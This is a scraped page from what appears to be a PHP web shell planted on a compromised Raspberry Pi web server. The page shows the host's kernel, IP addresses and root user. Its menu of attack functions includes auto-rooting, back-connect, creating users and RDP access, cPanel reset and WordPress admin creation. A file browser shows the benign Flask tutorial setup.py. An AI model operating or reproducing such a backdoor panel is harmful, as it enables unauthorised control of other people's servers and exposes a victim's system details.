Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
python-flask /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
flaskr
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
LICENSE
1.54
KB
-rw-r--r--
MANIFEST.in
118
B
-rw-r--r--
README.rst
1.28
KB
-rw-r--r--
setup.cfg
149
B
-rw-r--r--
setup.py
662
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : setup.py
import io from setuptools import find_packages, setup with io.open('README.rst', 'rt', encoding='utf8') as f: readme = f.read() setup( name='flaskr', version='1.0.0', url='http://flask.pocoo.org/docs/tutorial/', license='BSD', maintainer='Pallets team', maintainer_email='contact@palletsprojects.com', description='The basic blog app built in the Flask tutorial.', long_description=readme, packages=find_packages(), include_package_data=True, zip_safe=False, install_requires=[ 'flask', ], extras_require={ 'test': [ 'pytest', 'coverage', ], }, )
Close